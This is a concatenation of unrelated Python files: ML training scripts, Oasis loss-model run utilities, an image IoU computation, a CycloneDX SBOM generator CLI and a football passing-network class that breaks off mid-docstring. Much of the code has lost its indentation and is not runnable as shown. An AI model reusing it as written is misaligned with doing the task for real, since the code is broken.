if (step % 500 == 0):
print("Minibatch loss at step %d: %f" % (step, l))
print("Minibatch accuracy: %.1f%%" % accuracy(predictions, batch_labels))
print("Validation accuracy: %.1f%%" % accuracy(
valid_prediction.eval(), valid_labels))
print("Test accuracy: %.1f%%" % accuracy(test_prediction.eval(), test_labels))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Python utilities used for setting up the resources needed to complete a
model run, i.e. generating ktools outputs from Oasis files.
"""
from __future__ import print_function
import glob
import logging
import tarfile
from itertools import chain
import shutilwhich
import six
from pathlib2 import Path
from six import itervalues
__all__ = [
'create_binary_files',
'prepare_model_run_directory',
'prepare_model_run_inputs'
]
import os
import shutil
import subprocess
from ..utils.exceptions import OasisException
from .files import TAR_FILE, INPUT_FILES, GUL_INPUT_FILES, IL_INPUT_FILES
def prepare_model_run_directory(
run_dir_path,
oasis_files_src_path=None,
analysis_settings_json_src_file_path=None,
model_data_src_path=None,
inputs_archive=None,
):
"""
Ensures that the model run directory has the correct folder structure in
order for the model run script (ktools) to be executed.
::
<run_directory>
├── fifo
├── input
│ └── csv
├── output
├── static
└── work
If any subfolders are missing they are created.
Optionally, if the path to a set of Oasis files is provided then they
are copied into the ``input/csv`` subfolder.
Optionally, if the path to the analysis settings JSON file is provided
then it is copied to the base of the run directory.
Optionally, if the path to model data is provided then the files are
symlinked into the ``static`` subfolder provided the OS is of type
Darwin or Linux, otherwise the source folder tree is recursively
copied into the ``static`` subfolder.
:param run_directory: the model run directory
:type run_directory: str
:param oasis_files_src_path: path to a set of Oasis files
:type oasis_files_src_path: str
:param analysis_settings_json_src_file_path: analysis settings JSON file path
:type analysis_settings_json_src_file_path: str
:param model_data_src_path: model data source path
:type model_data_src_path: str
:param inputs_archive: path to a tar file containing input files
:type inputs_archive: str
"""
try:
for subdir in ['fifo', 'output', 'static', 'work']:
Path(run_dir_path, subdir).mkdir(parents=True, exist_ok=True)
if not inputs_archive:
Path(run_dir_path, 'input', 'csv').mkdir(parents=True, exist_ok=True)
else:
with tarfile.open(inputs_archive) as input_tarfile:
input_tarfile.extractall(path=(os.path.join(run_dir_path, 'input')))
if oasis_files_src_path:
oasis_files_destpath = os.path.join(run_dir_path, 'input', 'csv')
for p in os.listdir(oasis_files_src_path):
shutil.copy2(os.path.join(oasis_files_src_path, p), oasis_files_destpath)
if analysis_settings_json_src_file_path:
analysis_settings_json_dest_file_path = os.path.join(run_dir_path, 'analysis_settings.json')
shutil.copyfile(analysis_settings_json_src_file_path, analysis_settings_json_dest_file_path)
if model_data_src_path:
model_data_dest_path = os.path.join(run_dir_path, 'static')
for path in glob.glob(os.path.join(model_data_src_path, '*')):
filename = os.path.basename(path)
try:
os.symlink(path, os.path.join(model_data_dest_path, filename))
except Exception:
shutil.copytree(model_data_src_path, os.path.join(model_data_dest_path, filename))
except OSError as e:
raise OasisException(e)
def _prepare_input_bin(run_directory, bin_name, model_settings, setting_key=None):
bin_file_path = os.path.join(run_directory, 'input', '{}.bin'.format(bin_name))
if not os.path.exists(bin_file_path):
setting_val = model_settings.get(setting_key)
if not setting_val:
model_data_bin_file_path = os.path.join(run_directory, 'static', '{}.bin'.format(bin_name))
else:
# Format for data file names
setting_val = setting_val.replace(' ', '_').lower()
model_data_bin_file_path = os.path.join(run_directory, 'static', '{}_{}.bin'.format(bin_name, setting_val))
if not os.path.exists(model_data_bin_file_path):
raise OasisException('Could not find {} data file: {}'.format(bin_name, model_data_bin_file_path))
shutil.copyfile(model_data_bin_file_path, bin_file_path)
def prepare_model_run_inputs(analysis_settings, run_directory):
"""
Sets up binary files in the model inputs directory.
:param analysis_settings: model analysis settings dict
:type analysis_settings: dict
:param run_directory: model run directory
:type run_directory: str
"""
try:
model_settings = analysis_settings.get('model_settings', {})
_prepare_input_bin(run_directory, 'events', model_settings, setting_key='event_set')
_prepare_input_bin(run_directory, 'returnperiods', model_settings)
_prepare_input_bin(run_directory, 'occurrence', model_settings, setting_key='event_occurrence_id')
if os.path.exists(os.path.join(run_directory, 'static', 'periods.bin')):
_prepare_input_bin(run_directory, 'periods', model_settings)
except (OSError, IOError) as e:
raise OasisException(e)
def check_inputs_directory(directory_to_check, do_il=False, check_binaries=True):
"""
    Check that all the required CSV files are present in the directory.
    :param directory_to_check: the directory containing the CSV files
    :type directory_to_check: str
    :param do_il: whether insured loss (IL) is being computed; if True, the FM files must be present
    :type do_il: bool
    :param check_binaries: whether to fail if binary files already exist in the directory
    :type check_binaries: bool
    """
file_path = os.path.join(directory_to_check, TAR_FILE)
if os.path.exists(file_path):
raise OasisException("Inputs tar file already exists: {}".format(file_path))
if do_il:
input_files = (f['name'] for f in six.itervalues(INPUT_FILES) if f['type'] != 'optional')
else:
input_files = (f['name'] for f in six.itervalues(INPUT_FILES) if f['type'] not in ['optional', 'il'])
for input_file in input_files:
file_path = os.path.join(directory_to_check, input_file + ".csv")
if not os.path.exists(file_path):
raise OasisException("Failed to find {}".format(file_path))
if check_binaries:
file_path = os.path.join(directory_to_check, input_file + ".bin")
if os.path.exists(file_path):
raise OasisException("Binary file already exists: {}".format(file_path))
def create_binary_files(csv_directory, bin_directory, do_il=False):
"""
Create the binary files.
:param csv_directory: the directory containing the CSV files
:type csv_directory: str
:param bin_directory: the directory to write the binary files
:type bin_directory: str
:param do_il: whether to perform insured loss (IL) calculations; if true, FM file must be present
:type do_il: bool
"""
csvdir = os.path.abspath(csv_directory)
bindir = os.path.abspath(bin_directory)
if do_il:
input_files = itervalues(INPUT_FILES)
else:
input_files = (f for f in itervalues(INPUT_FILES) if f['type'] != 'il')
for input_file in input_files:
conversion_tool = input_file['conversion_tool']
input_file_path = os.path.join(csvdir, '{}.csv'.format(input_file['name']))
if not os.path.exists(input_file_path):
continue
output_file_path = os.path.join(bindir, '{}.bin'.format(input_file['name']))
cmd_str = "{} < {} > {}".format(conversion_tool, input_file_path, output_file_path)
try:
subprocess.check_call(cmd_str, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
raise OasisException(e)
def check_binary_tar_file(tar_file_path, check_il=False):
"""
Checks that all required files are present
:param tar_file_path: Path to the tar file to check
:type tar_file_path: str
:param check_il: Flag whether to check insured loss files
:type check_il: bool
:raises OasisException: If a required file is missing
:return: True if all required files are present
"""
expected_members = ('{}.bin'.format(f['name']) for f in six.itervalues(GUL_INPUT_FILES))
if check_il:
expected_members = chain(expected_members, ('{}.bin'.format(f['name']) for f in six.itervalues(IL_INPUT_FILES)))
with tarfile.open(tar_file_path) as tar:
for member in expected_members:
try:
tar.getmember(member)
except KeyError:
raise OasisException('{} is missing from the tar file {}.'.format(member, tar_file_path))
return True
def create_binary_tar_file(directory):
"""
Package the binaries in a gzipped tar.
"""
original_cwd = os.getcwd()
os.chdir(directory)
with tarfile.open(TAR_FILE, "w:gz") as tar:
for file in glob.glob('*.bin'):
tar.add(file)
os.chdir(original_cwd)
def check_conversion_tools(do_il=False):
# Check that the conversion tools are available
if do_il:
input_files = six.itervalues(INPUT_FILES)
else:
input_files = (f for f in six.itervalues(INPUT_FILES) if f['type'] != 'il')
for input_file in input_files:
tool = input_file['conversion_tool']
if shutilwhich.which(tool) is None:
error_message = "Failed to find conversion tool: {}".format(tool)
logging.error(error_message)
raise OasisException(error_message)
return True
def cleanup_bin_directory(directory):
"""
Clean the tar and binary files.
"""
for file in chain([TAR_FILE], (f + '.bin' for f in six.iterkeys(INPUT_FILES))):
file_path = os.path.join(directory, file)
if os.path.exists(file_path):
os.remove(file_path)
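# Illustrative sketch only: a typical call sequence for the helpers above, using
# made-up example paths (this function is not part of the original module).
def _example_binary_preparation():
    run_dir = '/tmp/model_run'
    prepare_model_run_directory(
        run_dir,
        oasis_files_src_path='/tmp/oasis_files',
        analysis_settings_json_src_file_path='/tmp/analysis_settings.json',
        model_data_src_path='/tmp/model_data',
    )
    csv_dir = os.path.join(run_dir, 'input', 'csv')
    bin_dir = os.path.join(run_dir, 'input')
    check_inputs_directory(csv_dir, do_il=False, check_binaries=True)
    check_conversion_tools(do_il=False)
    create_binary_files(csv_dir, bin_dir, do_il=False)
    create_binary_tar_file(bin_dir)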
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 17 11:27:35 2020
Compute an average iou between two images.
For each image in train_set, the pairwise iou for rest of images in dataset are computed.
@author: dipu
"""
import numpy as np
import os
import pickle
from multiprocessing import Pool, Value
from collections import defaultdict
import time
from functools import partial
import argparse
import random
class Counter(object):
def __init__(self):
self.val = Value('i', 0)
def add(self, n=1):
with self.val.get_lock():
self.val.value += n
@property
def value(self):
return self.val.value
Channel_img_dir = '../data/25ChannelImages'
split_set_file = '../data/UI_data.p'
rico_split_set = pickle.load(open(split_set_file, 'rb'))
train_uis = rico_split_set['train_uis']
train_uis = [x.replace('.png', '') for x in train_uis]
## Load all the images in memory, into a dictionay
img_dict = defaultdict(dict)
for ii in range(len(train_uis)):
imgA_pth = os.path.join(Channel_img_dir, train_uis[ii] + '.npy' )
imgA = np.load(imgA_pth)
img_dict[train_uis[ii]] = imgA
if ii%1000 == 0:
print('Loaded', ii)
print('\nSuccessfully Loaded all the images!')
def compute_iou(imgA_id, imgB_id):
#counter.add(1)
#imgA_pth = os.path.join(Channel_img_dir, imgA_id + '.npy' )
#imgB_pth = os.path.join(Channel_img_dir, imgB_id + '.npy' )
#imgA = np.load(imgA_pth)
#imgB = np.load(imgB_pth)
imgA = img_dict[imgA_id]
imgB = img_dict[imgB_id]
product = imgA*imgB
inter = np.sum(product,axis=(1,2))
    # Note: '+' is an element-wise sum, so 'union' is |A| + |B| per channel
    # (overlapping pixels are counted twice) rather than a strict logical OR.
    logical_or = imgA + imgB
    union = np.sum(logical_or, axis=(1, 2))
    #n_class_q = (np.sum(imgA, axis= (1,2)) > 0).sum() # number of components in first image
    # 'union' is already reduced to one value per channel, so count the non-empty
    # channels directly (summing again over axes (1, 2) would raise an AxisError).
    n_class_union = (union > 0).sum()
with np.errstate(divide='ignore', invalid='ignore'):
iou_c = np.true_divide(inter,union)
iou_c[iou_c == np.inf] = 0
iou_c = np.nan_to_num(iou_c)
#iou = np.sum(iou_c)/n_class_q
iou = np.sum(iou_c)/n_class_union ## Fixed !
#if counter.value % 1000 == 0 and counter.value >= 1000:
# print('{}'.format(counter.value))
return imgB_id, iou
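# Illustrative worked example for a single-channel pair: with
# imgA = [[[1, 1], [0, 0]]] and imgB = [[[1, 0], [0, 0]]], inter = [1] and
# union = [3] (the sum-based union counts |A| + |B|), one channel is non-empty,
# so the IoU value computed above for such a pair would be 1/3.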
#%%
def main(args):
segment = args.segment
train_seg = train_uis[(segment-1)*1000: segment*1000]
print('Starting computing iou values for segment ', args.segment)
tic = time.time()
iou_dict = defaultdict(dict)
#for ii in range(2):
    # Create the worker pool once; building a new Pool(30) on every iteration
    # would leak worker processes, since only the last pool is closed below.
    p = Pool(30)
    for ii in range(len(train_seg)):
        anchor = train_seg[ii]
        #counter = Counter()
        func = partial(compute_iou, anchor)
        results = p.map(func, train_uis)
temp_ids, temp_ious = map(list, zip(*results))
#sort it [may be optional, was done for selecting top 200 images]
temp_ids_s = [y for _,y in sorted(zip(temp_ious,temp_ids), reverse =True)]
temp_ious_s = [x for x,_ in sorted(zip(temp_ious,temp_ids), reverse =True)]
iou_dict[anchor]['ids_g40'] = [x for x,y in zip(temp_ids_s,temp_ious_s) if y>0.4]
iou_dict[anchor]['ious_g40'] = [y for x,y in zip(temp_ids_s,temp_ious_s) if y>0.4]
ids_b2040 = [x for x,y in zip(temp_ids_s,temp_ious_s) if y>0.2 and y<0.4 ]
n_b2040 = min (len(ids_b2040), 200)
iou_dict[anchor]['ids_b40'] = random.sample(ids_b2040, n_b2040)
if ii%1000 == 0:
print("Done", ii)
toc = time.time() - tic
print('Elapsed time: ', toc/3600, ' hrs')
p.close()
save_filename = 'iouValues_segment1000_%s.pkl'%(args.segment)
with open(save_filename, 'wb') as f:
pickle.dump(iou_dict, f)
print('saved to ', save_filename)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--segment', default = 6, type=int, metavar='N',
help='segment of the train_uis')
args = parser.parse_args()
main(args)
|
import os
import sys
import open3d as o3d
import numpy as np
import logging
import torch
import torch.multiprocessing as mp
try:
mp.set_start_method('forkserver') # Reuse process created
except RuntimeError:
pass
import torch.distributed as dist
from config import get_config
from lib.test import test
from lib.mptrain import train
from lib.utils import load_state_with_same_shape, get_torch_device, count_parameters
from lib.dataset import initialize_data_loader
from lib.datasets import load_dataset
from models import load_model, load_wrapper
import MinkowskiEngine as ME
os.environ['CUDA_VISIBLE_DEVICES'] = '4, 7'
use_cuda = torch.cuda.is_available()
data_files = '/data/hdd01/luoly/Minkowski/scan_processed/train/'
voxel_size = 0.05
batch_size = 16
def main():
# loss and network
num_devices = torch.cuda.device_count()
print(
"Testing ",
num_devices,
" GPUs. Total batch size: ",
num_devices * batch_size,
)
world_size = num_devices
mp.spawn(main_worker, nprocs=num_devices, args=(num_devices, world_size))
def main_worker(device, ngpus_per_node, config):
config = get_config()
device = get_torch_device(config.is_cuda)
num_devices = torch.cuda.device_count()
world_size = num_devices
rank = 0 * ngpus_per_node + num_devices - 1
dist.init_process_group(
backend="nccl",
init_method="tcp://localhost:23456",
world_size=world_size,
rank=rank,
)
DatasetClass = load_dataset(data_files)
logging.info('===> Initializing dataloader')
if config.is_train:
train_data_loader = initialize_data_loader(
DatasetClass,
config,
phase=config.train_phase,
num_workers=config.num_workers,
augment_data=True,
shuffle=True,
repeat=True,
batch_size=config.batch_size,
limit_numpoints=config.train_limit_numpoints)
val_data_loader = initialize_data_loader(
DatasetClass,
config,
num_workers=config.num_val_workers,
phase=config.val_phase,
augment_data=False,
shuffle=True,
repeat=False,
batch_size=config.val_batch_size,
limit_numpoints=False)
if train_data_loader.dataset.NUM_IN_CHANNEL is not None:
num_in_channel = train_data_loader.dataset.NUM_IN_CHANNEL
else:
num_in_channel = 3 # RGB color
num_labels = train_data_loader.dataset.NUM_LABELS
else:
test_data_loader = initialize_data_loader(
DatasetClass,
config,
num_workers=config.num_workers,
phase=config.test_phase,
augment_data=False,
shuffle=False,
repeat=False,
batch_size=config.test_batch_size,
limit_numpoints=False)
if test_data_loader.dataset.NUM_IN_CHANNEL is not None:
num_in_channel = test_data_loader.dataset.NUM_IN_CHANNEL
else:
num_in_channel = 3 # RGB color
num_labels = test_data_loader.dataset.NUM_LABELS
logging.info('===> Building model')
NetClass = load_model(config.model)
if config.wrapper_type == 'None':
model = NetClass(num_in_channel, num_labels, config)
logging.info('===> Number of trainable parameters: {}: {}'.format(NetClass.__name__,
count_parameters(model)))
else:
wrapper = load_wrapper(config.wrapper_type)
model = wrapper(NetClass, num_in_channel, num_labels, config)
logging.info('===> Number of trainable parameters: {}: {}'.format(
wrapper.__name__ + NetClass.__name__, count_parameters(model)))
logging.info(model)
torch.cuda.set_device(device)
model = model.to(device)
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[device])
model = ME.MinkowskiSyncBatchNorm.convert_sync_batchnorm(model)
if config.weights == 'modelzoo': # Load modelzoo weights if possible.
logging.info('===> Loading modelzoo weights')
model.preload_modelzoo()
# Load weights if specified by the parameter.
elif config.weights.lower() != 'none':
logging.info('===> Loading weights: ' + config.weights)
state = torch.load(config.weights)
if config.weights_for_inner_model:
model.model.load_state_dict(state['state_dict'])
else:
if config.lenient_weight_loading:
matched_weights = load_state_with_same_shape(
model, state['state_dict'])
model_dict = model.state_dict()
model_dict.update(matched_weights)
model.load_state_dict(model_dict)
else:
model.load_state_dict(state['state_dict'])
if config.is_train:
train(model, train_data_loader, val_data_loader, config)
else:
test(model, test_data_loader, config)
if __name__ == "__main__":
main()
|
import copy
import yaml
# Global constants
N_CHROM = 6
# Set default arguments
# Base config file to use
base_cfg_id = 'H_1-combined'
path_base_cfg = 'config/H_1-combined.yml'
# Pattern for output
pattern_output = 'powerAnalysis/data/simChrom_%s.%s'
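# e.g. pattern_output % ('y', 'txt') -> 'powerAnalysis/data/simChrom_y.txt'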
# Number of replicates
n_replicates = 10
# Path for output configuration
path_cfg = 'powerAnalysis/powerAnalysis.yml'
# Function definitions
def clean_config(cfg):
'''
Clean configuration dictionary parsed from YAML by stripping newlines and
whitespace.
'''
cfg = copy.copy(cfg)
for k, v in cfg.iteritems():
if type(v) is str:
cfg[k] = v.strip()
elif type(v) is dict:
cfg[k] = clean_config(v)
return(cfg)
def main():
# Load configuration
with open(path_base_cfg, 'rb') as f:
cfg = yaml.load(f)
cfg = clean_config(cfg)
# Change ID for power analysis
cfg['id'] = 'powerAnalysis'
# Change data paths
cfg['data']['chrom_path'] = pattern_output % ('y', 'txt')
cfg['data']['null_path'] = pattern_output % ('null', 'txt')
cfg['data']['regions_path'] = pattern_output % ('regions', 'txt')
cfg['data']['template_path'] = cfg['data']['template_path'].format(
id=base_cfg_id)
cfg['data']['n_chrom'] = n_replicates
# Save revised config
with open(path_cfg, 'wb') as f:
        yaml.dump(cfg, f, default_flow_style=False)
    # Return the config so that the caller below actually receives it.
    return cfg
if __name__=='__main__':
cfg = main()
|
#!/usr/bin/env python
# encoding: utf-8
# This file is part of CycloneDX Python
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
# Copyright (c) OWASP Foundation. All Rights Reserved.
import argparse
import os
import sys
from datetime import datetime
from cyclonedx.model import Tool
from cyclonedx.model.bom import Bom
from cyclonedx.output import BaseOutput, get_instance, OutputFormat, SchemaVersion
from cyclonedx.parser import BaseParser
from .parser.conda import CondaListExplicitParser, CondaListJsonParser
from .parser.environment import EnvironmentParser
from .parser.pipenv import PipEnvParser
from .parser.poetry import PoetryParser
from .parser.requirements import RequirementsParser
class CycloneDxCmdException(Exception):
pass
class CycloneDxCmdNoInputFileSupplied(CycloneDxCmdException):
pass
class CycloneDxCmd:
# Whether debug output is enabled
_DEBUG_ENABLED: bool = False
# Parsed Arguments
_arguments: argparse.Namespace
def __init__(self, args: argparse.Namespace) -> None:
self._arguments = args
if self._arguments.debug_enabled:
self._DEBUG_ENABLED = True
self._debug_message('!!! DEBUG MODE ENABLED !!!')
self._debug_message('Parsed Arguments: {}'.format(self._arguments))
def get_output(self) -> BaseOutput:
try:
parser = self._get_input_parser()
except CycloneDxCmdNoInputFileSupplied as e:
print(f'ERROR: {str(e)}')
exit(1)
except CycloneDxCmdException as e:
print(f'ERROR: {str(e)}')
exit(1)
if parser and parser.has_warnings():
print('')
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
print('!! Some of your dependencies do not have pinned version !!')
print('!! numbers in your requirements.txt !!')
print('!! !!')
for warning in parser.get_warnings():
print('!! -> {} !!'.format(warning.get_item().ljust(49)))
print('!! !!')
print('!! The above will NOT be included in the generated !!')
print('!! CycloneDX as version is a mandatory field. !!')
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
print('')
bom = Bom.from_parser(parser=parser)
# Add cyclonedx_bom as a Tool to record it being part of the CycloneDX SBOM generation process
if sys.version_info >= (3, 8, 0):
from importlib.metadata import version as md_version
else:
from importlib_metadata import version as md_version # type: ignore
bom.metadata.add_tool(tool=Tool(
vendor='CycloneDX', name='cyclonedx-bom', version=md_version('cyclonedx-bom')
))
return get_instance(
bom=bom,
output_format=OutputFormat[str(self._arguments.output_format).upper()],
schema_version=SchemaVersion['V{}'.format(
str(self._arguments.output_schema_version).replace('.', '_')
)]
)
def execute(self) -> None:
# Quick check for JSON && SchemaVersion <= 1.1
if str(self._arguments.output_format).upper() == 'JSON' and \
str(self._arguments.output_schema_version) in ['1.0', '1.1']:
self._error_and_exit(
message='CycloneDX schema does not support JSON output in Schema Versions < 1.2',
exit_code=2
)
output = self.get_output()
if self._arguments.output_file == '-' or not self._arguments.output_file:
self._debug_message('Returning SBOM to STDOUT')
print(output.output_as_string())
return
# Check directory writable
output_filename = os.path.realpath(self._arguments.output_file)
self._debug_message('Will be outputting SBOM to file at: {}'.format(output_filename))
output.output_to_file(filename=output_filename, allow_overwrite=self._arguments.output_file_overwrite)
@staticmethod
def get_arg_parser() -> argparse.ArgumentParser:
arg_parser = argparse.ArgumentParser(description='CycloneDX SBOM Generator')
input_group = arg_parser.add_mutually_exclusive_group(required=True)
input_group.add_argument(
'-c', '--conda', action='store_true',
help='Build a SBOM based on the output from `conda list --explicit` or `conda list --explicit --md5`',
dest='input_from_conda_explicit'
)
input_group.add_argument(
'-cj', '--conda-json', action='store_true',
help='Build a SBOM based on the output from `conda list --json`',
dest='input_from_conda_json'
)
input_group.add_argument(
'-e', '--e', '--environment', action='store_true',
help='Build a SBOM based on the packages installed in your current Python environment (default)',
dest='input_from_environment'
)
input_group.add_argument(
'-p', '--p', '--poetry', action='store_true',
            help='Build a SBOM based on a Poetry poetry.lock\'s contents. Use with -i to specify absolute path '
                 'to a `poetry.lock` you wish to use, else we\'ll look for one in the current working directory.',
dest='input_from_poetry'
)
input_group.add_argument(
'-pip', '--pip', action='store_true',
            help='Build a SBOM based on a PipEnv Pipfile.lock\'s contents. Use with -i to specify absolute path '
                 'to a `Pipfile.lock` you wish to use, else we\'ll look for one in the current working directory.',
dest='input_from_pip'
)
input_group.add_argument(
'-r', '--r', '--requirements', action='store_true',
            help='Build a SBOM based on a requirements.txt\'s contents. Use with -i to specify absolute path '
                 'to a `requirements.txt` you wish to use, else we\'ll look for one in the current working directory.',
dest='input_from_requirements'
)
input_method_group = arg_parser.add_argument_group(
title='Input Method',
description='Flags to determine how `cyclonedx-bom` obtains it\'s input'
)
input_method_group.add_argument(
'-i', '--in-file', action='store', metavar='FILE_PATH',
type=argparse.FileType('r'), # FileType does handle '-'
default=None,
help='File to read input from. Use "-" to read from STDIN.', dest='input_source', required=False
)
output_group = arg_parser.add_argument_group(
title='SBOM Output Configuration',
description='Choose the output format and schema version'
)
output_group.add_argument(
'--format', action='store', choices=['json', 'xml'], default='xml',
help='The output format for your SBOM (default: %(default)s)',
dest='output_format'
)
output_group.add_argument(
'--schema-version', action='store', choices=['1.4', '1.3', '1.2', '1.1', '1.0'], default='1.3',
help='The CycloneDX schema version for your SBOM (default: %(default)s)',
dest='output_schema_version'
)
output_group.add_argument(
'-o', '--o', '--output', action='store', metavar='FILE_PATH', default='cyclonedx.xml', required=False,
help='Output file path for your SBOM (set to \'-\' to output to STDOUT)', dest='output_file'
)
output_group.add_argument(
'-F', '--force', action='store_true', dest='output_file_overwrite',
help='If outputting to a file and the stated file already exists, it will be overwritten.'
)
arg_parser.add_argument('-X', action='store_true', help='Enable debug output', dest='debug_enabled')
return arg_parser
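    # Example invocations (illustrative; assumes the installed console script is
    # exposed as `cyclonedx-bom`):
    #   cyclonedx-bom -r -i requirements.txt --format json --schema-version 1.3 -o bom.json
    #   cyclonedx-bom -e --format xml -o -
    #   cyclonedx-bom -p -F -o cyclonedx.xml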
def _debug_message(self, message: str) -> None:
if self._DEBUG_ENABLED:
print('[DEBUG] - {} - {}'.format(datetime.now(), message))
@staticmethod
def _error_and_exit(message: str, exit_code: int = 1) -> None:
print('[ERROR] - {} - {}'.format(datetime.now(), message))
exit(exit_code)
def _get_input_parser(self) -> BaseParser:
if self._arguments.input_from_environment:
return EnvironmentParser()
# All other Parsers will require some input - grab it now!
if not self._arguments.input_source:
# Nothing passed via STDIN, and no FILENAME supplied, let's assume a default by input type for ease
current_directory = os.getcwd()
try:
if self._arguments.input_from_conda_explicit:
                    raise CycloneDxCmdNoInputFileSupplied('When using input from Conda Explicit, you need to pipe '
                                                          'input via STDIN')
elif self._arguments.input_from_conda_json:
                    raise CycloneDxCmdNoInputFileSupplied('When using input from Conda JSON, you need to pipe '
                                                          'input via STDIN')
elif self._arguments.input_from_pip:
self._arguments.input_source = open(os.path.join(current_directory, 'Pipfile.lock'), 'r')
elif self._arguments.input_from_poetry:
self._arguments.input_source = open(os.path.join(current_directory, 'poetry.lock'), 'r')
elif self._arguments.input_from_requirements:
self._arguments.input_source = open(os.path.join(current_directory, 'requirements.txt'), 'r')
else:
raise CycloneDxCmdException('Parser type could not be determined.')
except FileNotFoundError as e:
raise CycloneDxCmdNoInputFileSupplied(
f'No input file was supplied and no input was provided on STDIN:\n{str(e)}'
)
input_data_fh = self._arguments.input_source
with input_data_fh:
input_data = input_data_fh.read()
input_data_fh.close()
if self._arguments.input_from_conda_explicit:
return CondaListExplicitParser(conda_data=input_data)
elif self._arguments.input_from_conda_json:
return CondaListJsonParser(conda_data=input_data)
elif self._arguments.input_from_pip:
return PipEnvParser(pipenv_contents=input_data)
elif self._arguments.input_from_poetry:
return PoetryParser(poetry_lock_contents=input_data)
elif self._arguments.input_from_requirements:
return RequirementsParser(requirements_content=input_data)
else:
raise CycloneDxCmdException('Parser type could not be determined.')
def main() -> None:
parser = CycloneDxCmd.get_arg_parser()
args = parser.parse_args()
CycloneDxCmd(args).execute()
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 19 2020
@author: Sergio Llana (@SergioMinuto90)
"""
from abc import ABC, abstractmethod
import pandas as pd
from utils import read_json, read_event_data, tracking_data, to_single_playing_direction
from processing import PassingNetworkBuilder
class MetricaPassingNetwork(PassingNetworkBuilder, ABC):
def __init__(self, args):
self.context = getattr(args, "context", None)
self.half = getattr(args, "half", None)
self.plot_type = args.plot_type
self.team_name = args.team_name
self.match_id = args.match_id
self.plot_name = None
self.df_events = None
self.plot_title = None
self.plot_legend = None
self.df_tracking = None
self.num_minutes = None
self.player_position = None
self.pair_pass_value = None
self.pair_pass_count = None
self.player_pass_value = None
self.player_pass_count = None
def read_data(self):
"""
Read Metrica eventing and tracking data of the selected 'match_id', generating two pandas DataFrames.
Data's X coordinate must be reversed in the second period, as we need the same attacking direction in both periods.
"""
data_path = "data/tracking"
# Read both tracking and eventing data
df_events = read_event_data(data_path, self.match_id)
df_events['Minute'] = df_events['Start Time [s]'] / 60.0
df_tracking_home = tracking_data(data_path, self.match_id, "Home")
df_tracking_away = tracking_data(data_path, self.match_id, "Away")
df_tracking_home, df_tracking_away, df_events = to_single_playing_direction(df_tracking_home, df_tracking_away, df_events)
self.df_events = df_events
self.df_tracking = df_tracking_home if self.team_name == "Home" else df_tracking_away
def compute_total_minutes(self):
"""
Compute the maximum number of minutes that are used for the passing network.
The idea is not to have more/less than 11 players in the team because of substitutions or red cards.
As Metrica does not provide an event type for substitutions, tracking data is used to know when the first
player is introduced in the pitch (player number 12), as he would not have NaN in his column anymore.
"""
max_minute = self.df_events["Minute"].max()
first_substitution_player = self.df_tracking.columns[24]
first_substitution_minute = self.df_tracking[~self.df_tracking[first_substitution_player].isna()]["Time [s]"].min()/60.0
first_red_card_minute = self.df_events[(self.df_events["Type"] == "CARD") & (self.df_events["Subtype"] == "RED")]["Minute"].min()
self.num_minutes = min(first_substitution_minute, first_red_card_minute, max_minute)
def set_text_info(self):
"""
Set the plot's name, title and legend information based on the customization chosen with the command line arguments.
"""
# Name of the .PNG in the plots/ folder
self.plot_name = "metrica_match{0}_{1}_{2}".format(self.match_id, self.team_name, self.plot_type)
# Title of the plot
opponent_team = "Away" if self.team_name == "Home" else "Home"
self.plot_title ="{0}'s passing network against {1} (Metrica Sports tracking data)".format(self.team_name, opponent_team)
# Information in the legend
if self.context or self.half:
context_meaning = "Context: "
if self.context and not self.half:
context_meaning += self.context
elif not self.context and self.half:
ball_team = self.team_name if self.half == "own_half" else opponent_team
context_meaning += "ball in {0}'s half".format(ball_team)
else:
ball_team = self.team_name if self.half == "own_half" else opponent_team
context_meaning += "{0}, ball in {1}'s half".format(self.context, ball_team)
context_meaning += "\n"
else:
context_meaning = ""
location_meaning = "players avg. position" if self.plot_type == "tracking" else "pass origin"
self.plot_legend = "{0}Location: {1}\nSize: number of passes\nColor: number of passes".format(context_meaning, location_meaning)
@abstractmethod
def prepare_data(self):
pass
class MetricaBasicPassingNetwork(MetricaPassingNetwork):
def __init__(self, args):
super(MetricaBasicPassingNetwork, self).__init__(args)
def prepare_data(self):
"""
Prepares the five pandas DataFrames that 'draw_pass_map' needs.
"""
# We select all passes done by the selected team before the minute of the first substitution or red card.
df_passes = self.df_events[(self.df_events["Type"] == "PASS") &
(self.df_events["Team"] == self.team_name) &
(self.df_events["Minute"] < self.num_minutes)].copy()
df_passes = df_passes.rename(columns={"Start X": "origin_pos_x", "Start Y": "origin_pos_y"})
# In this type of plot, both the size and color (i.e. value) mean the same: number of passes
self.player_pass_value = df_passes.groupby("From").size().to_frame("pass_value")
self.player_pass_count = df_passes.groupby("From").size().to_frame("num_passes")
# 'pair_key' combines the names of the passer and receiver of each pass (sorted alphabetically)
df_passes["pair_key"] = df_passes.apply(lambda x: "_".join(sorted([x["From"], x["To"]])), axis=1)
self.pair_pass_value = df_passes.groupby("pair_key").size().to_frame("pass_value")
self.pair_pass_count = df_passes.groupby("pair_key").size().to_frame("num_passes")
# Average pass origin's coordinates for each player
self.player_position = df_passes.groupby("From").agg({"origin_pos_x": "median", "origin_pos_y": "median"})
class MetricaTrackingPassingNetwork(MetricaPassingNetwork):
def __init__(self, args):
super(MetricaTrackingPassingNetwork, self).__init__(args)
def _context_frames(self):
"""
Basic algorithm to detect ball possession changes.
Note that frames out of effective playing time are not considered.
Returns
-----------
